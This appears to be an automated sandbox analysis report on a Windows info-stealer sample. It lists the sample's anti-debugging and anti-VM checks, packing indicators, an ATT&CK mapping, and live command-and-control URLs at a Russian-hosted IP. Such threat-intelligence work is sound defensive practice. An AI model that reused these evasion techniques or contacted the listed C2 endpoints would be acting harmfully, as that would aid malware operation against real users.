                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0151C second address: 4A01522 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01522 second address: 4A01526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01526 second address: 4A015F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c pushad 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F99FD381EF1h 0x00000014 sub ch, 00000046h 0x00000017 jmp 00007F99FD381EF1h 0x0000001c popfd 0x0000001d mov ecx, 79BCADF7h 0x00000022 popad 0x00000023 popad 0x00000024 mov eax, dword ptr [esi+34h] 0x00000027 jmp 00007F99FD381EEAh 0x0000002c mov dword ptr [edx+34h], eax 0x0000002f jmp 00007F99FD381EF0h 0x00000034 test ecx, 00000700h 0x0000003a pushad 0x0000003b call 00007F99FD381EEEh 0x00000040 mov bh, al 0x00000042 pop edx 0x00000043 push ecx 0x00000044 mov edi, 5168EBDEh 0x00000049 pop ebx 0x0000004a popad 0x0000004b jne 00007F9A6E2B005Bh 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 pushfd 0x00000055 jmp 00007F99FD381EF7h 0x0000005a or eax, 085BB13Eh 0x00000060 jmp 00007F99FD381EF9h 0x00000065 popfd 0x00000066 call 00007F99FD381EF0h 0x0000006b pop ecx 0x0000006c popad 0x0000006d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A015F5 second address: 4A01610 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7E7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01610 second address: 4A01614 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01614 second address: 4A01626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01626 second address: 4A0162A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0162A second address: 4A0162E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473B17 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473BF5 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 6274F6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 473B21 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 69F439 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB165 rdtsc 0_2_006FB165
                Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 657
                Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1279
                Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 1038
                Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 765
                Source: C:\Users\user\Desktop\file.exe | API coverage: 4.6 %
                Source: C:\Users\user\Desktop\file.exe TID: 7352 | Thread sleep count: 68 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7352 | Thread sleep time: -136068s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 145 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 168 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 160 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7336 | Thread sleep count: 657 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7336 | Thread sleep time: -1314657s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7340 | Thread sleep count: 1279 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7340 | Thread sleep time: -2559279s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 106 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 72 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 93 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 80 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7272 | Thread sleep count: 79 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7344 | Thread sleep count: 1038 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7344 | Thread sleep time: -2077038s >= -30000s
                Source: C:\Users\user\Desktop\file.exe TID: 7340 | Thread sleep count: 765 > 30
                Source: C:\Users\user\Desktop\file.exe TID: 7340 | Thread sleep time: -1530765s >= -30000s
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\file.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00417727 FindFirstFileExW,0_2_00417727
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0495798E FindFirstFileExW,0_2_0495798E
                Source: file.exe, file.exe, 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.4452747313.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.4452747313.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 42% for more than 60s
                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006FB165 rdtsc 0_2_006FB165
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402A50
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04797D41 push dword ptr fs:[00000030h] 0_2_04797D41
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04940D90 mov eax, dword ptr fs:[00000030h] 0_2_04940D90
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494092B mov eax, dword ptr fs:[00000030h] 0_2_0494092B
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00418592 GetProcessHeap,0_2_00418592
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00409A2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409A2A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040CDE3
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A58A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0040A58A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A720 SetUnhandledExceptionFilter,0_2_0040A720
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_04949C91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_04949C91
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494A7F1 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494A7F1
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494D04A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0494D04A
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0494A987 SetUnhandledExceptionFilter,0_2_0494A987
                Source: file.exe, file.exe, 00000000.00000002.4452325212.00000000005F9000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: SProgram Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040A2EC cpuid 0_2_0040A2EC
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00410822 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,0_2_00410822

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.4940e67.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000003.2004309647.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.4452266147.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.4453807873.0000000004940000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK Matrix (one line per tactic; a number in parentheses is the count of matched signatures the report attached to that technique)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
                Execution: Command and Scripting Interpreter (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
                Defense Evasion: Virtualization/Sandbox Evasion (341); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1); Compile After Delivery
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
                Discovery: System Time Discovery (1); Security Software Discovery (771); Virtualization/Sandbox Evasion (341); Process Discovery (3); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (213)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (1); Application Layer Protocol (11); Fallback Channels; Multiband Communication; Commonly Used Port
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Source | Detection | Scanner | Label | Link
file.exe | 34% | ReversingLabs | Win32.Infostealer.Tinba
file.exe | 100% | Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
Source | Detection | Scanner | Label | Link
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubG | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2 | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubH | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubD | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubCon | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubf | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubE | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_ | 100% | Avira URL Cloud | malware
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb | 100% | Avira URL Cloud | malware
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubCon | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubH | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubG | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubf | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubE | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubD | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub2 | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubR | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubb | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosubr | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub_ | file.exe, 00000000.00000002.4452747313.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.156.72.65 | unknown | Russian Federation | 44636 | ITDELUXE-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1565722
Start date and time: 2024-11-30 16:41:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240s for sample files taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• VT rate limit hit for: file.exe
Time | Type | Description
10:42:23 | API Interceptor | 10170234x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65/soft/download
                    No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65
ITDELUXE-ASRU | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65
                    No context
                    No context
                    No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.94671984196727
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 2'008'064 bytes
MD5: 24fd69187bd9cb0bfbae4c051db9e658
SHA1: 484e593d6f0410027ec108a670a0f2e4b112244a
SHA256: 31dc48b6c89b00fffa7e3377584085558cc79bec167ba7143cc75915696369e7
SHA512: e4e68cdc83cd9a8601f0ba5ec4ddbd232bfb108b32486a339f49664582b5dc7e2db14dbbe5f57c8eec088081b7bd209f527f6002212955eda7dcf216bbca2a82
SSDEEP: 49152:lilRiZSDkSe/03fv9HsyW1n6RIs1QNvIZnGZ:VZR/8qy8UlG1IVG
TLSH: CD953310BCD66576EC0364B3C509060B571A714DB6FC28EA9B90E89A3BF787D3B910F6
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
Icon Hash: cfa99b8a8651798d
Entrypoint: 0x8b1000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: TERMINAL_SERVER_AWARE
Time Stamp: 0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 0
File Version Major: 5
File Version Minor: 0
Subsystem Version Major: 5
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                    Programming Language:
                    • [C++] VS2008 build 21022
                    • [ASM] VS2008 build 21022
                    • [ C ] VS2008 build 21022
                    • [IMP] VS2005 build 50727
                    • [RES] VS2008 build 21022
                    • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x4ac814 | 0x18 | iqkzmigc
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x65000 | 0x3ae00 | 74f57d58fbfdfdcc88b14b347dcdf64f | False | 0.9952312234607219 | data | 7.941794412700174 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0x8234 | 0x3c00 | fa4eeacd684a9a1b8728647c1d2560e8 | False | 0.9262369791666667 | data | 7.693474866742781 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x70000 | 0x298000 | 0x200 | cf6471dafce72c7e87e1653bd81b07c6 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iqkzmigc | 0x308000 | 0x1a8000 | 0x1a7e00 | 5066610809911025e1dde63177e679ac | False | 0.9920429307357712 | data | 7.9499747194883374 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
afatghvh | 0x4b0000 | 0x1000 | 0x600 | f337a217146227c7e9cafe951ac9ab45 | False | 0.603515625 | data | 5.205812931078851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x4b1000 | 0x3000 | 0x2200 | 1fc31b3b91c236382acde4613866b604 | False | 0.07065716911764706 | DOS executable (COM) | 0.8050504511683647 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
RT_CURSOR | 0x67308 | 0x8a8 | OpenPGP Public Key | | | 1.0049638989169676
RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
RT_CURSOR | 0x68118 | 0xea8 | data | | | 1.0029317697228144
RT_CURSOR | 0x68fc0 | 0x8a8 | data | | | 1.0049638989169676
RT_CURSOR | 0x69868 | 0x568 | data | | | 0.5228260869565218
RT_ICON | 0x4ac874 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
RT_ICON | 0x4ac874 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
RT_ICON | 0x4acf3c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
RT_ICON | 0x4acf3c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
RT_ICON | 0x4af4e4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
RT_ICON | 0x4af4e4 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
